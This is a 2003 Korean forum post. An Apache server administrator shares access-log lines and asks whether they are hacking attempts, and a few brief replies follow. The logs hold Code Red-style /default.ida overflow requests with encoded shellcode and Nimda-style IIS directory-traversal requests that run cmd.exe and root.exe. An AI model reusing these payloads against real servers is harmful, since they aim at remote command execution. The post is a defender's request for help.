이건 또먼지 ---;;; 황당한것들이 만네요
220.83.181.176 - - [24/Apr/2003:19:49:19 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
220.83.181.176 - - [24/Apr/2003:19:54:00 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
다시 이런것들 ㅡ.ㅡ
220.83.49.129 - - [24/Apr/2003:20:32:38 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.49.129 - - [24/Apr/2003:20:32:39 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
이런거 여러개 있지만 이제부터 표시 안할께요 ㅡㅡ
220.83.181.176 - - [24/Apr/2003:20:41:59 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273
다시 요넘 -_- 수시로 들어오는넘이네요 ㅡㅡ
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:19:54:59 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:19:55:00 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
220.83.224.198 - - [25/Apr/2003:20:08:23 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:20:08:24 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
220.83.224.198 - - [25/Apr/2003:20:08:24 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
220.83.224.198 - - [25/Apr/2003:20:08:24 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
이런식으로도해킹 가능한걸까요? --- 상당히 의심스러운 로그인데 먼말인지 몰라서 올립니다;;;
댓글 4
-
커터칼
2003.04.26 12:35
보니깐 IIS같은데.. 패치를 해보세요... -
쓸쓴한달빛
2003.04.26 14:52
아파치에요 -_-;; -
happy sua!
2003.04.26 18:27
커터칼//민망하시겠다..-_-;; -
쓸쓴한달빛
2003.04.28 18:10
하앗 제송합니다-_-본인이 처음에 세부적인것을 말하지 않아서 생긴 문제군요 ---;;
iis라면 처음엔 머엿지?? -_-비주얼 ??/로 스크립트 폴더가있어서 해킹시도인게 분명하다는건 아는데요 -_-아파치이기에 ..질문을 하였습니다 -_-
-_-..
그럼이만 제송했습니다;